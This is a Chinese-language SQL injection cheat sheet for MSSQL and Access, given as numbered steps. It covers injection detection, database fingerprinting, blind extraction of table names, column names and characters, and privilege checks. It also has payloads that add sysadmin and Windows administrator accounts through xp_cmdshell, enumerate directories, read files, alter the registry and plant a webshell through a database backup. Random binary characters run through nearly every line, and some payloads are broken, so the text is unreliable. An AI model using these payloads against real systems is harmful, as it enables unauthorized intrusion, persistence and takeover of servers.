1.判断是否有注入;and 1=1 ;and 1=2 e�+��!+(D�
2.初步判断是否是mssql ;and user>0 >z`���^Q�[
Zw)*+> +FV
3.注入参数是字符'and [查询条件] and ''=' T.f�m�El�
e�u]t.Co[X
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �N��f#8V|
RcASFBNpS
5.判断数据库系统 D}�;zPf@!p
�7^fpb�rj
;and (select count(*) from sysobjects)>0 mssql C�{i9~�80n
gm-I�)z!tz
;and (select count(*) from msysobjects)>0 access b&y�"[1`��
�DRB��Rs-D
��4@qKML��
C;�T:'�Uws
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?9_RI(a.}�
>#���q2KXh
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �6e�vW
�O!
R3G+�tE/�Y
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �|HjoaN��)
��`eh�Z(H}
9.(1)猜字段的ascii值(access) <�O���5�r|
,Tb�~+z|-[
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ?HP54G<{xz
],fu#pi=]�
(2)猜字段的ascii值(mssql) QJcaOXyMS�
Tr^Eg��w�]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �T[z]~M�JL
nTJ-�1A7EP
10.测试权限结构(mssql) `�sS\8��~A
uG|d�7LS,%
Y4�\BH�Fq�
W;��Rx�(o>
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =5UT'�3p>�
LIo3a38n?y
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- hdw-ge�m{?
+B
4&��$z
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- $#cZJ@��;]
�YpAJ7�E|7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �"k�8Yc<`u
b.`<�T�"y�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- X��`[P1�1`
JQ>GK�u�~�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �U��5 �`�h
GAZTCkB�"�
;and 1=(select IS_MEMBER('db_owner'));-- ^1a/)B�e{_
�P��Y4RwN�
ad\?@�>[�I
vZgV/?��'z
11.添加mssql和系统的帐户 ^V
DJGBk��
*Cdw�"�n
;exec master.dbo.sp_addlogin username;-- ,&DK*LT�8U
;exec master.dbo.sp_password null,username,password;-- LP{{PT�.&X
aUdb��N&G�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �K+0&�~X�U
_f~(g1sE��
;exec master.dbo.xp_cmdshell 'net user username password U{I�Y
F{;@
2k
}:)]��m
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ^4+ew>BLSv
`5[�$��8;�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Q^&oXM'x/i
h\oAW�?�^�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- x>>#<hOz�[
"[�P��xLq5
Zu4�|�1��W
L|y4u;-Q�
12.(1)遍历目录 |Wops�V
%�
pjC2jlwm*�
;create table dirs(paths varchar(100), id int) %i�dn7STJ}
�1]yOC)u"i
;insert dirs exec master.dbo.xp_dirtree 'c:\' E%eTjvvxus
dQ6n[$Q@�N
;and (select top 1 paths from dirs)>0 jWn!96NhlL
SIJ:[=5!7�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 6.o8vC/P�Z
&GF|Rr8NXs
�bIF��K��P
l7 +�#gPA�
(2)遍历目录
��Di�[}y;
-BY'E�$]4�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- bYuQ�"K
A$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �7e��QE[�C
j\^�0BTZ�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Oz�\mIV�C#
R W=��<EF&
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 6��GxQ��<�
y$n7'�W�6
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 \m.ap+d�Fa
j@kL`�Q\&I
h8b*=�oq
s6#@S4^=\�
13.mssql中的存储过程 zW`Zmt�\T2
U($sH���9,
xp_regenumvalues 注册表根键, 子键 �hK!Z���~
��;(�a\F��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ;j#$d@VG"�
f8�ap+�][
xp_regread 根键,子键,键值名 ?'xT�S�An�
"�6T: �&>
;exec xp_regread ��;l^4/BR
?;{�fqeJz
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 p*11aaIbp~
�-m�S�i�Z�
xp_regwrite 根键,子键, 值名, 值类型, 值 l!n��<.tQW
8�1����\$X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��J{GtH�[�
�L{��v^:��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 w#?@�ulr]d
8�q�)wT0A~
xp_regdeletevalue 根键,子键,值名 0-�)D`�s%�
$a�e*3L>5M
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9n$0OH�
/q
�nI1DLV�t
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 >28.^\?�H4
�4$~]�t:�n
J`��6X6YZ�
~~��U2S��r
14.mssql的backup创建webshell �?��e? mg�
��0D�[D;MW
use model �$r��B20�!
-�1t�dyCez
create table cmd(str image); OD,�"�8�JF
!J34yr�o+s
insert into cmd(str) values (''); cJEO�w��AN
=1dU~B�:Lm
backup database model to disk='c:\l.asp'; OSQt:�5�8K
5:�j��bd:o
��P);:�t~
e=11EmN��9
15.mssql内置函数 ]�;bl;BP��
dg%Orvu�z�
;and (select @@version)>0 获得Windows的版本号 � u�s&�!%`
6�E9y[ %+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa )���P6n,�\
��NL��e�+�
;and (select user_name())>0 爆当前系统的连接用户 ]J^�9iDTTA
.s4�hFB^n�
;and (select db_name())>0 得到当前连接的数据库 fV�-vy]x..
J��jb(l��W
V\��u�d4�
�O[p;IG�`�
16.简洁的webshell -��Yaw>$nJ
�x+V;UD=mH
use model >U~B"'�!xV
_":yUa0�D�
create table cmd(str image); Ua.7_E�m��
)PC(��1Z�n
insert into cmd(str) values (''); ;4�jRsirx9
M�r�}]P(4h
backup database model to disk='g:\wwwtest\l.asp';
